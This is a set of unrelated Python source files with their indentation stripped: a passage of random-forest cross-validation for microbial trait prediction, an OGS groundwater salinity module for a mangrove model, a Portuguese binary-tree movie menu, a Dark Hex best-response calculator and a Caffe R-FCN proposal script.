plt.ylim(0, 1.05)
print np.mean(accuracy_v_DG)
print np.std(accuracy_v_DG)
print np.mean(f1_scores_DG)
print np.std(f1_scores_DG)
# Mean matrix o
m_mean_DG = deepcopy(mat_DG[0])
for m in mat_DG[1:]:
m_mean_DG += m
print m_mean_DG / float(cv_n)
# for row in range(4):
# print ((m_mean_DG / float(cv_n))[row, :]/np.sum(mat_DG[0], axis=1)[row]*100)
norm_DG = (m_mean_DG / float(cv_n)).astype('float') / (m_mean_DG / float(cv_n)).sum(axis=1)[:, np.newaxis]
plot_confusion_matrix(norm_DG, ["HT", "T", "M", "P"],
normalize=False,
cmap=plt.cm.YlGnBu)
# Most important nodes for model prediction, and pathways to which they belong
c_gini_DG = Counter(np.concatenate(gini_DG))
c_DG, pathways_DG = get_pathways_from_nodes(c_gini_DG.keys())
pathways_g_DG = []
for n in np.concatenate(gini_DG):
n = n.split("_")[0]
pathways_g_DG += pathways_DG[n]
c_all_DG = Counter(np.array(pathways_g_DG)[:, 1])
c_mean_DG = Counter({key: v / float(cv_n) for key, v in c_all_DG.items()})
# Histogram index nodes per number of models
index_nodes_DG = {ky: list(enzs_only).index(ky) for ky in c_gini_DG.keys()}
c_gini_idx_DG = {index_nodes_DG[ky]: v for ky, v in c_gini_DG.items()}
plt.figure(figsize=(10, 7))
plt.bar(range(len(c_gini_idx_DG)), np.array(sorted(c_gini_idx_DG.values(),
reverse=True)) * 100. / cv_n) # plots the number of model counts per union of 50 most important nodes for all models.
plt.xlabel("Nodes", fontsize=16)
plt.ylabel("Percentage of models with node in 50 most important", fontsize=16)
plt.xticks(fontsize=16)
plt.yticks(fontsize=16)
plt.tight_layout()
# Mean of tree max depths
print np.mean(depths_DG)
# =============================================================================
#
# SIMPLIFIED HABITAT PREDICTION
#
# =============================================================================
matrix_hab = simplified_matrix[:, df_species.habMix.notnull()]
classesHmix = df_species.habMix[df_species.habMix.notnull()].values
accuracy_v_habMix = []
gini_habMix = []
mat_habMix = []
f1_scores_habMix = []
depths_habMix = []
cv_n = 300
for cv in xrange(cv_n): #cross validation
print cv
habitatRF = RandomForestClassifierClass(matrix=matrix_hab,
classes=classesHmix,
weights={"Environment": 0.33,
"Symbiont": 0.47,
"Mixed":0.20,
},
ntrees=1000,
kwargs={})
# Split dataset
habitatRF.train_test_validation()
# Fit on train dataset
habitatRF.rf_model_fit()
# Test dataset prediciton
habitatRF.predict_test()
# True validation - independent testing set
habitatRF.predict_valid()
accuracy_v_habMix.append(sum(habitatRF.y_pred_v == habitatRF.y_v) / float(len(habitatRF.y_v)))
f1_scores_habMix.append(f1_score(habitatRF.y_v, habitatRF.y_pred_v, labels=["Environment", "Symbiont", "Mixed"],
average="micro"))
# Feature importances
gini_50_nodes = nodes_simplified[np.argsort(habitatRF.clf.feature_importances_)[::-1]][:50]
gini_habMix.append(gini_50_nodes)
#Get depth
max_dpth = max([dectree.tree_.max_depth for dectree in habitatRF.clf.estimators_])
depths_habMix.append(max_dpth)
print np.mean(accuracy_v_habMix)
print np.std(accuracy_v_habMix)
print np.mean(f1_scores_habMix)
print np.std(f1_scores_habMix)
# Plot cross-validation boxplot of accuracies per class
m_diag_habMix = [np.diag(m) for m in mat_habMix]
plt.figure(figsize=(10, 7))
sns.boxplot(data=(np.array(m_diag_habMix) / np.sum(mat_habMix[0], axis=1).astype(float)),
palette=sns.color_palette(["lightgreen", "#d82f00", "goldenrod", ]))
plt.xticks(range(3), ["Environment", "Symbiont", "Mixed"], fontsize=18)
plt.ylabel("Accuracy", fontsize=20)
plt.xlabel("Habitat", fontsize=20)
plt.yticks(fontsize=18)
plt.ylim(0, 1.05)
# Mean matrix o
m_mean_habMix = deepcopy(mat_habMix[0])
for m in mat_habMix[1:]:
m_mean_habMix += m
print m_mean_habMix / float(cv_n)
norm_habMix = (m_mean_habMix / float(cv_n)).astype('float') / (m_mean_habMix / float(cv_n)).sum(axis=1)[:, np.newaxis]
plot_confusion_matrix(norm_habMix, ["Environment", "Symbiont", "Mixed"],
normalize=False,
cmap=plt.cm.YlGnBu)
c_gini_habMix = Counter(np.concatenate(gini_habMix))
c, pathways = get_pathways_from_nodes(c_gini_habMix.keys())
pathways_g_habMix = []
for n in np.concatenate(gini_habMix):
n = n.split("_")[0]
pathways_g_habMix += pathways[n]
c_all_habMix = Counter(np.array(pathways_g_habMix)[:, 1])
c_mean_habMix = Counter({key: v / float(cv_n) for key, v in c_all_habMix.items()})
#Histogram index nodes per number of models
index_nodes_habMix = {ky:list(nodes_simplified).index(ky) for ky in c_gini_habMix.keys()}
c_gini_idx_habMix = {index_nodes_habMix[ky]:v for ky, v in c_gini_habMix.items()}
plt.figure(figsize=(10,7))
plt.bar(range(len(c_gini_idx_habMix)), np.array(sorted(c_gini_idx_habMix.values(), reverse=True)) * 100./cv_n) #plots the number of model counts per union of 50 most important nodes for all models.
plt.xlabel("Nodes", fontsize=16)
plt.ylabel("Percentage of models with node in 50 most important", fontsize=16)
plt.xticks(fontsize=16)
plt.yticks(fontsize=16)
plt.xlim(0, 177)
plt.tight_layout()
#Mean of tree max depths
print np.mean(depths_habMix)
# =============================================================================
#
# OXYGEN TOLERANCE PREDICTION
#
# =============================================================================
matrix_oxygenSimpl = simplified_matrix[:, df_species.oxySimpl.notnull()]
classesOsimpl = df_species.oxySimpl[df_species.oxySimpl.notnull()].values
accuracy_v_oxySimp = []
gini_oxySimp = []
mat_oxySimp = []
f1_scores_oxySimp = []
depths_oxySimp = []
cv_n = 300
for cv in xrange(cv_n): # cross validation
print cv
oxySimp = RandomForestClassifierClass(matrix=matrix_oxygenSimpl,
classes=classesOsimpl,
weights={"Aerobe": 917./2231,
"Facultative": 782/2231.,
"Anaerobe": 532./2231,
},
ntrees=1000,
kwargs={})
# Split dataset
oxySimp.train_test_validation()
# Fit on train dataset
oxySimp.rf_model_fit()
# Test dataset prediciton
oxySimp.predict_test()
# True validation - independent testing set
oxySimp.predict_valid()
accuracy_v_oxySimp.append(sum(oxySimp.y_pred_v == oxySimp.y_v) / float(len(oxySimp.y_v)))
f1_scores_oxySimp.append(f1_score(oxySimp.y_v, oxySimp.y_pred_v,
labels=['Aerobe', 'Facultative', 'Anaerobe'],
average="micro"))
# Feature importances
gini_50_nodes = nodes_simplified[np.argsort(oxySimp.clf.feature_importances_)[::-1]][:50]
gini_oxySimp.append(gini_50_nodes)
# Get depth
max_dpth = max([dectree.tree_.max_depth for dectree in oxySimp.clf.estimators_])
depths_oxySimp.append(max_dpth)
# Real as lines, preds as cols
m = confusion_matrix(oxySimp.y_v, oxySimp.y_pred_v,
labels=['Aerobe', 'Facultative',
'Anaerobe'])
mat_oxySimp.append(m)
print np.mean(f1_scores_oxySimp)
print np.std(f1_scores_oxySimp)
print np.mean(accuracy_v_oxySimp)
print np.std(accuracy_v_oxySimp)
# Plot cross-validation boxplot of accuracies per class
m_diag_oxySimp = [np.diag(m) for m in mat_oxySimp]
plt.figure(figsize=(10, 7))
sns.boxplot(data=(np.array(m_diag_oxySimp) / np.sum(mat_oxySimp[0], axis=1).astype(float)), )
# palette=sns.color_palette(["lightgreen", "#d82f00", "goldenrod", ]))
plt.xticks(range(3), ['Aerobe', 'Facultative',
'Anaerobe'], fontsize=16)
plt.ylabel("Accuracy", fontsize=20)
plt.xlabel("Oxygen Tolerance", fontsize=20)
plt.yticks(fontsize=18)
plt.ylim(0, 1.05)
# Mean matrix o
m_mean_oxySimp = deepcopy(mat_oxySimp[0])
for m in mat_oxySimp[1:]:
m_mean_oxySimp += m
print m_mean_oxySimp / float(cv_n)
norm_oxySimp = (m_mean_oxySimp / float(cv_n)).astype('float') / (m_mean_oxySimp / float(cv_n)).sum(axis=1)[:, np.newaxis]
plot_confusion_matrix(norm_oxySimp, ["Aerobe", "Facultative", "Anaerobe"],
normalize=False,
cmap=plt.cm.YlGnBu)
c_gini_oxySimp = Counter(np.concatenate(gini_oxySimp))
c, pathways = get_pathways_from_nodes(c_gini_oxySimp.keys())
pathways_g_oxySimp = []
for n in np.concatenate(gini_oxySimp):
n = n.split("_")[0]
pathways_g_oxySimp += pathways[n]
c_all_oxySimp = Counter(np.array(pathways_g_oxySimp)[:, 1])
c_mean_oxySimp = Counter({key: v / float(cv_n) for key, v in c_all_oxySimp.items()})
# Histogram index nodes per number of models
index_nodes_oxySimp = {ky: list(nodes_simplified).index(ky) for ky in c_gini_oxySimp.keys()}
c_gini_idx_oxySimp = {index_nodes_oxySimp[ky]: v for ky, v in c_gini_oxySimp.items()}
plt.figure(figsize=(10,7))
plt.bar(range(len(c_gini_idx_oxySimp)), np.array(sorted(c_gini_idx_oxySimp.values(), reverse=True)) * 100. / cv_n) # plots the number of model counts per union of 50 most important nodes for all models.
plt.xlabel("Nodes", fontsize=16)
plt.ylabel("Percentage of models with node in 50 most important", fontsize=16)
plt.xticks(fontsize=16)
plt.yticks(fontsize=16)
plt.xlim(0,177)
plt.tight_layout()
# Mean of tree max depths
print np.mean(depths_oxySimp) |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
@date: 2018-Today
@author: <EMAIL>
"""
import numpy as np
from TreeModelLib.BelowgroundCompetition.OGSLargeScale3D import OGSLargeScale3D
from lxml import etree
from os import path
import os
## OGS integration for belowground competition concept. This case is
# using the OGS software to calculate changes in pore water salinity using
# a detailed groundwater model. Here, no Feedback is considered.
# @param args: Please see input file tag documentation for details
# @date: 2019 - Today
class OGSWithoutFeedback(OGSLargeScale3D):
def __init__(self, args):
super().__init__(args)
if args.find("use_old_ogs_results") is not None:
use_old_ogs_results = (
args.find("use_old_ogs_results").text == "True")
if use_old_ogs_results:
print("pyMANGA is using old results from previously saved" +
" numpy arrays.")
else:
self.runOGSOnce()
else:
self.runOGSOnce()
## This function calculates the mean salinity by given abiotic drivers.
# The resulting salinities are used for each MANGA timestep since there is
# no feedback considered here..
def runOGSOnce(self):
try:
print("Trying to remove previous results...")
os.remove(
path.join(path.dirname(path.dirname(path.abspath(__file__))),
"OGSWithoutFeedback/cumsum_salinity.npy"))
os.remove(
path.join(path.dirname(path.dirname(path.abspath(__file__))),
"OGSWithoutFeedback/calls_in_last_timestep.npy"))
print("Previous results removed.")
except FileNotFoundError:
print("No files found.")
self._t_end = float(self._xml_t_end.text)
self.copyPythonScript()
self._constant_contributions = np.zeros_like(self._volumes)
self._salinity_prefactors = np.zeros_like(self._volumes)
np.save(
path.join(self._ogs_project_folder, "constant_contributions.npy"),
self._constant_contributions)
np.save(path.join(self._ogs_project_folder, "salinity_prefactors.npy"),
self._salinity_prefactors)
current_project_file = path.join(self._ogs_project_folder,
"pymanga_" + self._ogs_project_file)
self._tree.write(current_project_file)
print("Calculating belowground resources distribution using ogs...")
bc_path = (path.dirname(path.dirname(path.abspath(__file__))))
if not (os.system(bc_path + "/OGS/bin/ogs " + current_project_file +
" -o " + self._ogs_project_folder +
" -l error") == 0):
raise ValueError("Ogs calculation failed!")
print("OGS-calculation done.")
## This function updates and returns BelowgroundResources in the current
# timestep. For each tree a reduction factor is calculated which is defined
# as: resource uptake at zero salinity/ real resource uptake.
def calculateBelowgroundResources(self):
cumsum_salinity = np.load(
path.join(self._ogs_project_folder, "cumsum_salinity.npy"))
calls_per_cell = np.load(
path.join(self._ogs_project_folder, "calls_in_last_timestep.npy"))
salinity = cumsum_salinity / calls_per_cell
for tree_id in range(len(self._tree_constant_contribution)):
ids = self._tree_cell_ids[tree_id]
mean_salinity_for_tree = np.mean(salinity[ids])
belowground_resource = (
(self._tree_constant_contribution[tree_id] +
mean_salinity_for_tree *
self._tree_salinity_prefactor[tree_id]) /
self._tree_constant_contribution[tree_id])
self.belowground_resources.append(belowground_resource)
## This functions prepares the next timestep for the competition
# concept. In the OGS concept, information on t_ini and t_end is stored.
# Additionally, arrays are prepared to store information on water uptake
# of the participating trees. Moreover, the ogs-prj-file for the next
# timestep is updated and saved in the ogs-project folder.
# @param t_ini: initial time of next timestep
# @param t_end: end time of next timestep
def prepareNextTimeStep(self, t_ini, t_end):
self._t_ini = t_ini
self._t_end = t_end
self._xml_t_initial.text = str(self._t_ini)
self._xml_t_end.text = str(self._t_end)
self._tree_cell_ids = []
self._tree_constant_contribution = []
self._tree_salinity_prefactor = []
self._constant_contributions = np.zeros_like(self._volumes)
self._salinity_prefactors = np.zeros_like(self._volumes)
self._t_end_list.append(self._t_end)
try:
self._t_ini_zero
except AttributeError:
self._t_ini_zero = self._t_ini
## List containing reduction factor for each tree
self.belowground_resources = []
## This function copies the python script which defines BC and source terms
# to the ogs project folder.
def copyPythonScript(self):
if self._use_external_python_script:
source = open(
path.join(self._ogs_project_folder,
self._external_python_script), "r")
else:
source = open(
path.join(path.dirname(path.abspath(__file__)),
"python_source.py"), "r")
target = open(path.join(self._ogs_project_folder, "python_source.py"),
"w")
constants_filename = path.join(self._ogs_project_folder,
"constant_contributions.npy")
prefactors_filename = path.join(self._ogs_project_folder,
"salinity_prefactors.npy")
cumsum_filename = path.join(self._ogs_project_folder,
"cumsum_salinity.npy")
calls_filename = path.join(self._ogs_project_folder,
"calls_in_last_timestep.npy")
for line in source.readlines():
if self._abiotic_drivers:
for abiotic_factor in self._abiotic_drivers.iterchildren():
if (abiotic_factor.tag + " = ") in line:
line = (abiotic_factor.tag + " = " +
abiotic_factor.text + "\n")
if "constant_contributions.npy" in line:
line = line.replace("constant_contributions.npy",
constants_filename)
if "salinity_prefactors.npy" in line:
line = line.replace("salinity_prefactors.npy",
prefactors_filename)
if "cumsum_salinity.npy" in line:
line = line.replace("cumsum_salinity.npy", cumsum_filename)
if "calls_in_last_timestep.npy" in line:
line = line.replace("calls_in_last_timestep.npy",
calls_filename)
if "CellInformation(source_mesh)" in line:
line = line.replace(
"source_mesh",
"'" + path.join(self._ogs_project_folder,
self._source_mesh_name) + "'")
if "t_write = t_end" in line:
line = line.replace("t_end", str(self._t_end))
target.write(line)
source.close()
target.close()
|
<reponame>pauloprojject/projectED
# -*- coding: utf-8 -*-
"""ProjetoED2.ipynb
Automatically generated by Colaboratory.
Original file is located at
https://colab.research.google.com/drive/1m7cjca9CLUc5wNSFW2zfVq_KRzRYlhgW
# Tree Exception
"""
class BinaryTreeException(Exception):
def __init__(self, mensagem):
super().__init__(mensagem)
"""# Dado"""
class Dado:
def __init__(self, id, nome, ano):
self._nome = nome
self._ano = ano
self._id = id
#get
@property
def nome(self):
return self._nome
#set
@nome.setter
def nome(self, novo):
self._nome = novo
#get
@property
def ano(self):
return self._ano
#set
@ano.setter
def ano(self, novo):
self._ano = novo
#get
@property
def id(self):
return self._id
#set
@id.setter
def id(self, novo):
self._id = novo
def __str__(self):
saida = '[\n'
saida += f' id: {self.id},\n filme: {self.nome},\n ano de lançamento: {self.ano}\n'
saida += ']'
return saida
"""# Nó"""
class No:
def __init__(self, dado = None):
self._dado = dado
self._esq = None
self._dir = None
# get
@property
def dado(self):
return self._dado
# set
@dado.setter
def dado(self, novo):
self._dado = novo
# get
@property
def esq(self):
return self._esq
# set
@esq.setter
def esq(self, novo):
self._esq = novo
# get
@property
def dir(self):
return self._dir
# set
@dir.setter
def dir(self, novo):
self._dir = novo
#get
@property
def nome(self):
return self._dado.nome
#get
@property
def id(self):
return self._dado.id
#get
@property
def ano(self):
return self._dado.ano
def balanco(self):
prof_esq = 0
if self.esq:
prof_esq = self.esq.profundidade()
prof_dir = 0
if self.dir:
prof_dir = self.dir.profundidade()
return prof_esq - prof_dir
def profundidade(self):
prof_esq = 0
if self.esq:
prof_esq = self.esq.profundidade()
prof_dir = 0
if self.dir:
prof_dir = self.dir.profundidade()
return 1 + max(prof_esq, prof_dir)
def balanco_exec(self):
a = self.balanco()
if a > 1:
if self.esq.balanco() < 0:
self.esq = rotacao_esq(self.esq)
self = rotacao_dir(self)
return self
elif a < -1:
if self.dir.balanco() > 0:
self.dir = rotacao_dir(self.dir)
self = rotacao_esq(self)
return self
else:
return self
######## <stack_overflow>
def display(self):
lines, *_ = self._display_aux()
for line in lines:
print(line)
def _display_aux(self):
"""Returns list of strings, width, height, and horizontal coordinate of the root."""
# No child.
if self.dir is None and self.esq is None:
line = '%s' % self.dado.id
width = len(line)
height = 1
middle = width // 2
return [line], width, height, middle
# Only esq child.
if self.dir is None:
lines, n, p, x = self.esq._display_aux()
s = '%s' % self.dado.id
u = len(s)
first_line = (x + 1) * ' ' + (n - x - 1) * '_' + s
second_line = x * ' ' + '/' + (n - x - 1 + u) * ' '
shifted_lines = [line + u * ' ' for line in lines]
return [first_line, second_line] + shifted_lines, n + u, p + 2, n + u // 2
# Only dir child.
if self.esq is None:
lines, n, p, x = self.dir._display_aux()
s = '%s' % self.dado.id
u = len(s)
first_line = s + x * '_' + (n - x) * ' '
second_line = (u + x) * ' ' + '\\' + (n - x - 1) * ' '
shifted_lines = [u * ' ' + line for line in lines]
return [first_line, second_line] + shifted_lines, n + u, p + 2, u // 2
# Two children.
esq, n, p, x = self.esq._display_aux()
dir, m, q, y = self.dir._display_aux()
s = '%s' % self.dado.id
u = len(s)
first_line = (x + 1) * ' ' + (n - x - 1) * '_' + s + y * '_' + (m - y) * ' '
second_line = x * ' ' + '/' + (n - x - 1 + u + y) * ' ' + '\\' + (m - y - 1) * ' '
if p < q:
esq += [n * ' '] * (q - p)
elif q < p:
dir += [m * ' '] * (p - q)
zipped_lines = zip(esq, dir)
lines = [first_line, second_line] + [a + u * ' ' + b for a, b in zipped_lines]
return lines, n + m + u, max(p, q) + 2, n + u // 2
######## </stack_overflow>
"""# Tree"""
class BinaryTree:
def inOrder(self, arvore):
if arvore != None:
self.inOrder(arvore.esq)
print(arvore.dado.id, end=' ')
self.inOrder(arvore.dir)
def rotacao_dir(arvore):
aux = arvore.esq
arvore.esq = aux.dir
aux.dir = arvore
return aux
def rotacao_esq(arvore):
aux = arvore.dir
arvore.dir = aux.esq
aux.esq = arvore
return aux
def insere(raiz, no):
if raiz.dado.id < no.dado.id:
if raiz.dir == None:
raiz.dir = no
else:
insere(raiz.dir, no)
else:
if raiz.esq == None:
raiz.esq = no
else:
insere(raiz.esq, no)
def buscaID(raiz, chave):
if type(chave) != int:
raise BinaryTreeException('apenas números')
if raiz.dado == None:
raise BinaryTreeException('Árvore vazia')
atual = raiz
while atual.id != chave:
if chave < atual.id:
atual = atual.esq
else:
atual = atual.dir
if atual == None:
return 'chave não encontrada'
return f'Nome: {atual.dado.nome}, Ano: {atual.dado.ano}'
def buscaANO(raiz, chave):
if raiz != None:
buscaANO(raiz.dir, chave)
if raiz.dado.ano == chave:
print(raiz.dado)
else:
return 'chave não encontrada'
buscaANO(raiz.esq, chave)
"""# Menu"""
nomes = []
print('Adiciona o nó raiz:')
nome = input("Insira o nome do filme: ")
nomes.append(nome)
idd = int(input("Insira o ID do filme: "))
ano = int(input("Insira o ano de lançamento do filme: "))
filme = Dado(idd,nome,ano)
raiz = No(filme)
while True:
menu = int(input("Selecione uma alternativa:\n(1) Inserir\n(2) Buscar por ID\n(3) Buscar filme por ano\n(4) Listar filmes em ordem alfabética\n(5) Altura da árvore\n(6) Exibir a árvore\n(7) Sair\n"))
if menu == 7:
break
if menu == 1:
while True:
nome = input("Insira o nome do filme: ")
nomes.append(nome)
idd = int(input("Insira o ID do filme: "))
ano = int(input("Insira o ano de lançamento do filme: "))
filme = Dado(idd,nome,ano)
add = No(filme)
insere(raiz, add)
raiz = raiz.balanco_exec()
loop = input("Deseja adicionar outro filme? S/N \n").upper()
if loop == 'N':
break
if menu == 2:
while True:
pesq = int(input("Insira o ID do filme: "))
print(f'O filme do id {pesq} é:')
print(buscaID(raiz, pesq))
loop = input("Deseja pesquisar outro filme? N para negativo \n").upper()
if loop == 'N':
break
if menu == 3:
while True:
pesq = int(input("Insira o ano de lançamento do filme: "))
print('O(s) filme(s) desse ano é(são):')
buscaANO(raiz, pesq)
loop = input("Deseja pesquisar outro filme? N para negativo \n").upper()
if loop == "N":
break
if menu == 4:
print(sorted(nomes))
if menu == 5:
print('A altura da árvore é: ' + str(raiz.profundidade()))
if menu == 6:
opc = int(input("(1) Modo avaliação\n(2) Modo bonito \n"))
if opc == 1:
tree = BinaryTree()
tree.inOrder(raiz)
elif opc == 2:
raiz.display()
else:
print("opção invalida") |
"""
Using open_spiel dark_hex implementation
to calculate best response value for a given player strategy.
"""
import typing
from collections import defaultdict
import pydot
from decimal import Decimal
import pyspiel
from darkhex.utils.util import (get_open_spiel_state, save_file)
class Node:
"""Best response strategy state node. """
def __init__(self,
info_state: str,
reach_prob: float,
wait_node: bool,
value: float = 0.,
is_terminal: bool = False):
self.info_state = info_state
self.reach_prob = reach_prob
self.value = value
self.wait_node = wait_node
self.node_key = (info_state, wait_node)
self.is_terminal = is_terminal
# X <- [Node, Node], 0: action node, 1: wait node
# Wait node can be none, but action node will never be none.
# - Wait node must have if_wait = True
# - Action node must have if_wait = False
self.children = defaultdict(lambda: [None, None])
self.best_action = None
def __repr__(self):
return f"{self.info_state}:{self.reach_prob}:{self.value}:{self.wait_node}"
class BRTree:
"""
Best Response tree functionality. Driver for the Nodes.
"""
def __init__(self, br_player: int):
self.root = None
self.nodes = {} # type: typing.Dict[str, Node]
self.br_player = br_player
def add_node(self,
state: pyspiel.State,
reach_prob: float,
parent: Node = None,
action: int = None,
value: float = 0.):
""" Add a node to the tree. """
info_state = state.information_state_string(self.br_player)
wait_node = len(state.legal_actions(self.br_player)) == 0
key = (info_state, wait_node)
if key not in self.nodes:
self.nodes[key] = Node(info_state, reach_prob, wait_node, value)
# Connect the node to the parent
if parent is not None:
parent_node = self.get_node(parent.node_key)
if parent_node is not self.nodes[key]:
if parent_node.wait_node:
parent_node.children[-1] = [self.nodes[key], None]
else:
parent_node.children[action][int(
self.nodes[key].wait_node)] = self.nodes[key]
return self.nodes[key]
def add_terminal_node(self,
state: pyspiel.State,
parent: Node = None,
action: int = None,
reach_prob: float = Decimal('1.0'),
value: float = 0.):
""" Add a terminal node to the tree. """
wait_node = len(state.legal_actions(self.br_player)) == 0
parent_node = self.get_node(parent.node_key)
if parent_node.children[action][int(wait_node)] is not None:
parent_node.children[action][int(
wait_node)].reach_prob += reach_prob
else:
parent_node.children[action][int(wait_node)] = Node(
state.information_state_string(self.br_player) + f':T:{action}',
reach_prob,
wait_node,
value,
is_terminal=True)
def get_node(self, node_key: tuple) -> Node:
"""
Get a node from the tree.
"""
return self.nodes.get(node_key, None)
class BestResponse:
def __init__(
self,
game: pyspiel.Game,
strategy_player: int,
initial_state: str,
num_cols: int,
strategy: typing.Dict[str, typing.List[typing.Tuple[int, float]]],
file_path: str,
):
self.game = game
self.s_player = strategy_player
self.br_player = 1 - strategy_player
self.initial_state = initial_state
self.strategy = strategy
self.num_cols = num_cols
self.file_path = file_path
self.full_game_state_cache = {}
@staticmethod
def _br_value(val: float) -> float:
# return (val + 1) / 2
return Decimal(str(val))
def _generate_value_tree(
self,
cur_state: pyspiel.State,
br_tree: BRTree,
parent_node: Node,
reach_prob: Decimal = Decimal('1.0')) -> float:
"""
Generate the value tree for the best response player playing against
the given player strategy.
value is always in perspective of the best response player. Only the
terminal states are assigned a value for now, later on we backpropagate
to update the value of the parent states.
"""
cur_player = cur_state.current_player()
info_state = cur_state.information_state_string()
full_state = cur_state.information_state_string(0) + \
cur_state.information_state_string(1)
if full_state in self.full_game_state_cache:
return
self.full_game_state_cache[full_state] = True
if cur_player == self.br_player:
# best response players turn
for action in cur_state.legal_actions():
next_state = cur_state.child(action)
if next_state.is_terminal():
value = self._br_value(next_state.returns()[self.br_player])
br_tree.add_terminal_node(next_state, parent_node, action,
reach_prob, value)
else:
new_node = br_tree.add_node(next_state, reach_prob,
parent_node, action)
self._generate_value_tree(next_state, br_tree, new_node,
reach_prob)
return
# strategy players turn
for action, prob in self.strategy[info_state]:
next_state = cur_state.child(action)
if next_state.is_terminal():
value = self._br_value(next_state.returns()[self.br_player])
decimal_prob = Decimal(str(prob)) * Decimal(str(reach_prob))
br_tree.add_terminal_node(next_state, parent_node, action,
decimal_prob, value)
else:
decimal_prob = Decimal(str(prob)) * Decimal(str(reach_prob))
new_node = br_tree.add_node(next_state, decimal_prob,
parent_node, action)
self._generate_value_tree(next_state, br_tree, new_node,
decimal_prob)
def _backpropogate_values(self, br_tree: BRTree, cur_node: Node = None):
"""
Backpropogate the values from the terminal nodes to the parent nodes.
"""
if cur_node is None:
cur_node = br_tree.root
if cur_node.is_terminal:
# Terminal node
cur_node.value *= cur_node.reach_prob
return cur_node.value
tot_value = Decimal('0.0')
mx_value = Decimal('-inf')
for action, children in cur_node.children.items():
children_value = Decimal('0.0')
for child in children:
if child is not None:
children_value += self._backpropogate_values(br_tree, child)
tot_value += children_value
mx_value = max(mx_value, children_value)
if cur_node.wait_node:
cur_node.value = tot_value
return tot_value
cur_node.value = mx_value
return mx_value
def best_response_strategy(self, br_strategy_info):
"""
Calculate the best response strategy for the given player strategy and
calculated best response values.
br_strategy is greedy. So always: br_strategy[info_state] = [(action,1)]
"""
br_strategy: typing.Dict[str, typing.List[typing.Tuple[int,
float]]] = {}
for (info_state, wait_node), cur_node in br_strategy_info.items():
if wait_node:
continue
# find the best action for the given info state
best_action = None
best_value = Decimal('-inf')
for action, children in cur_node.children.items():
children_value = Decimal('0.0')
for child in children:
if child is None:
continue
children_value += child.value
if children_value > best_value:
best_value = children_value
best_action = action
br_strategy[info_state] = [(best_action, 1.0)]
cur_node.best_action = best_action
return br_strategy
def _calculate_br_value(self, cur_state: pyspiel.State) -> float:
"""
Calculate the best response value for the given player strategy and
calculated opponent strategy.
"""
br_value = Decimal('0.0')
cur_player = cur_state.current_player()
info_state = cur_state.information_state_string()
for action, prob in self.strategies[cur_player][info_state]:
new_state = cur_state.child(action)
if new_state.is_terminal():
value = (Decimal(str(new_state.returns()[self.br_player])) \
+ Decimal('1.0')) / Decimal('2.0')
else:
value = self._calculate_br_value(new_state)
br_value += Decimal(str(value)) * Decimal(str(prob))
return br_value
@staticmethod
def graph_test(br_tree: BRTree, file_path: str):
"""
Draw the tree graph.
"""
graph = pydot.Dot(graph_type='digraph')
for node in br_tree.nodes.values():
node_id = node.info_state + '\n' + str(node.value) + '\n' + str(
node.reach_prob) + '\n' + str(node.wait_node)
if node.wait_node:
graph.add_node(
pydot.Node(node_id, style='filled', fillcolor='#ff0000'))
else:
graph.add_node(pydot.Node(node_id))
for node in br_tree.nodes.values():
node_id = node.info_state + '\n' + str(node.value) + '\n' + str(
node.reach_prob) + '\n' + str(node.wait_node)
for action, children in node.children.items():
for child in children:
if child is None:
continue
ch_info = child.info_state + '\n' + str(
child.value) + '\n' + str(
child.reach_prob) + '\n' + str(child.wait_node)
graph.add_edge(
pydot.Edge(node_id, ch_info, label=str(action)))
graph.write_png(file_path)
def best_response(self):
"""
Calculate the best response value for the given player strategy.
"""
game_state = get_open_spiel_state(self.game, self.initial_state)
# Generate the BR tree
br_tree = BRTree(self.br_player)
br_tree.root = br_tree.add_node(game_state, Decimal('1.0'))
self._generate_value_tree(game_state, br_tree, br_tree.root)
# Backpropogate the values
self._backpropogate_values(br_tree)
# graph test
# self.graph_test(br_tree, 'tmp/br_tree.png')
# Generate best response strategy
br_strategy = self.best_response_strategy(br_tree.nodes)
# self.br_strategy = load_file(self.file_path)
# calculate the best response value
self.strategies = {
self.s_player: self.strategy,
self.br_player: br_strategy,
}
br_value = 1 - self._calculate_br_value(
game_state) # how good the given strategy is
# write the opponent strategy to a file
save_file(br_strategy, self.file_path)
return br_value
|
import sys
sys.path.append('/net/wujial/py-R-FCN/caffe/python')
sys.path.append('/net/wujial/py-R-FCN/lib')
import caffe
import numpy as np
import scipy.io as sio
from plot_fig import *
from fast_rcnn.test import _get_blobs
from fast_rcnn.bbox_transform import clip_boxes, bbox_transform_inv
import cv2
from fast_rcnn.config import cfg
cfg.TEST.HAS_RPN = True
cfg.TRAIN.SCALE = (600,)
cfg.TEST.SCALE = (600,)
model_name = 'residual_pos_neg_attention_18'
#model_name = 'rfcn_alt_opt_5step_ohem'
#imdir = '/net/wujial/py-R-FCN/data/demo/006177.jpg'
imdir = "/net/wujial/py-R-FCN/VOCdevkit/VOC2007/JPEGImages/000001.jpg"
im = cv2.imread(imdir)
rpn_proto = "/net/wujial/py-R-FCN/models/pascal_voc/ResNet-50/rfcn_alt_opt_5step_ohem/rpn_test.pt"
rpn_model = "/net/wujial/py-R-FCN/output/rfcn_alt_opt_5step_ohem/voc_2007_trainval/stage1_rpn_final.caffemodel"
prototxt = '/net/wujial/py-R-FCN/models/pascal_voc/ResNet-50/' + model_name + '/soft_rfcn_test.pt'
model = '/net/wujial/py-R-FCN/models/pascal_voc/ResNet-50/' + model_name + '/resnet50_rfcn_mask_ohem_iter_80000.caffemodel'
#model = '/net/wujial/py-R-FCN/models/pascal_voc/ResNet-50/' + model_name + '/stage1_mask_rfcn_final.caffemodel'
#model = "/net/wujial/py-R-FCN/models/pascal_voc/ResNet-50/rfcn_alt_opt_5step_ohem/resnet50_rfcn_ohem_iter_120000.caffemodel"
caffe.set_mode_gpu()
caffe.set_device(2)
rfcn_net = caffe.Net(rpn_proto,rpn_model, caffe.TEST)
blobs, im_scales = _get_blobs(im, None)
im_blob = blobs['data']
blobs['im_info'] = np.array([[im_blob.shape[2], im_blob.shape[3], im_scales[0]]], dtype=np.float32)
rfcn_net.blobs['data'].reshape(*(blobs['data'].shape))
rfcn_net.blobs['im_info'].reshape(*(blobs['im_info'].shape))
forward_kwargs = {'data': blobs['data'].astype(np.float32, copy=False)}
forward_kwargs['im_info'] = blobs['im_info'].astype(np.float32, copy=False)
blobs_out = rfcn_net.forward(**forward_kwargs)
rois = rfcn_net.blobs['rois'].data.copy()
boxes = rois[:, 1:5] / im_scales[0]
cfg.TEST.HAS_RPN = False
